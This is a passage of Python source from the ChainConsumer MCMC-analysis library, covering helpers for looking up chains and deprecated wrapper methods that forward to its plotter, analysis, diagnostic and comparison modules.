for j, (c, w) in enumerate(zip(data, ws)):
con.add_chain(c, weights=w, name="Chain %d" % j, parameters=chain.parameters)
return con
def _get_chain(self, chain):
if isinstance(chain, Chain):
return [self.chains.index(chain)]
if isinstance(chain, str):
names = [c.name for c in self.chains]
assert chain in names, "Chain %s not found!" % chain
index = [i for i, n in enumerate(names) if chain == n]
elif isinstance(chain, int):
assert chain < len(self.chains), "Chain index %d not found!" % chain
index = [chain]
else:
raise ValueError("Type %s not recognised for chain" % type(chain))
return index
def _get_chain_name(self, index):
return self.chains[index].name
def _all_names(self):
return [c.name for c in self.chains]
# Deprecated methods
def plot(self, *args, **kwargs): # pragma: no cover
print("This method is deprecated. Please use chainConsumer.plotter.plot instead")
return self.plotter.plot(*args, **kwargs)
def plot_walks(self, *args, **kwargs): # pragma: no cover
print("This method is deprecated. Please use chainConsumer.plotter.plot_walks instead")
return self.plotter.plot_walks(*args, **kwargs)
def get_latex_table(self, *args, **kwargs): # pragma: no cover
print("This method is deprecated. Please use chainConsumer.analysis.get_latex_table instead")
return self.analysis.get_latex_table(*args, **kwargs)
def get_parameter_text(self, *args, **kwargs): # pragma: no cover
print("This method is deprecated. Please use chainConsumer.analysis.get_parameter_text instead")
return self.analysis.get_parameter_text(*args, **kwargs)
def get_summary(self, *args, **kwargs): # pragma: no cover
print("This method is deprecated. Please use chainConsumer.analysis.get_summary instead")
return self.analysis.get_summary(*args, **kwargs)
def get_correlations(self, *args, **kwargs): # pragma: no cover
print("This method is deprecated. Please use chainConsumer.analysis.get_correlations instead")
return self.analysis.get_correlations(*args, **kwargs)
def get_correlation_table(self, *args, **kwargs): # pragma: no cover
print("This method is deprecated. Please use chainConsumer.analysis.get_correlation_table instead")
return self.analysis.get_correlation_table(*args, **kwargs)
def get_covariance(self, *args, **kwargs): # pragma: no cover
print("This method is deprecated. Please use chainConsumer.analysis.get_covariance instead")
return self.analysis.get_covariance(*args, **kwargs)
def get_covariance_table(self, *args, **kwargs): # pragma: no cover
print("This method is deprecated. Please use chainConsumer.analysis.get_covariance_table instead")
return self.analysis.get_covariance_table(*args, **kwargs)
def diagnostic_gelman_rubin(self, *args, **kwargs): # pragma: no cover
print("This method is deprecated. Please use chainConsumer.diagnostic.gelman_rubin instead")
return self.diagnostic.gelman_rubin(*args, **kwargs)
def diagnostic_geweke(self, *args, **kwargs): # pragma: no cover
print("This method is deprecated. Please use chainConsumer.diagnostic.geweke instead")
return self.diagnostic.geweke(*args, **kwargs)
def comparison_aic(self): # pragma: no cover
print("This method is deprecated. Please use chainConsumer.comparison.aic instead")
return self.comparison.aic()
def comparison_bic(self): # pragma: no cover
print("This method is deprecated. Please use chainConsumer.comparison.bic instead")
return self.comparison.bic()
def comparison_dic(self): # pragma: no cover
print("This method is deprecated. Please use chainConsumer.comparison.dic instead")
return self.comparison.dic()
def comparison_table(self, *args, **kwargs): # pragma: no cover
print("This method is deprecated. Please use chainConsumer.comparison.comparison_table instead")
return self.comparison.comparison_table(*args, **kwargs) | PypiClean |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.